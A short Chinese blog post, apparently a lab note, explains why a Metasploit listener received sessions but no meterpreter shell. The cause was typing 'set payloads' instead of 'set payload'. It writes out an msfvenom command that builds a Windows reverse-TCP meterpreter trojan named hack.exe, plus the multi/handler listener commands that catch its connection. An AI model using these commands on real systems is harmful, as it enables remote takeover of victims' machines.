msf中收到了sessions却不反弹meterpreter的原因-爱代码爱编程
msf中收到了sessions却不反弹meterpreter的原因
问题描述:
生成木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
lhost=192.168.189.130 lport=12346 -f exe >/hack.exe
监听并激活
use exploit/multi/handler
进入监听模块exploit/multi/handler是一个后门模块,配置一个反弹会话处理程序
set payloads windows/meterpreter/reverse_tcp
设置payload反弹,切记不是payloads(我这里的命令有误,这也是我这次出错的原因,下方文章会有解释)
(在开始攻击的时候要木马文件在被攻击的目标系统运行才能攻击成功)
set lhost 192.168.189.130
set lport 12346
exploit
原因如下:
我的原因是因为把
set payload windows/meterpreter/reverse_tcp
输错成了
set payloads windows/meterpreter/reverse_tcps
多输入了个s
实验过程如下
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/Xionghuimin/article/details/110453369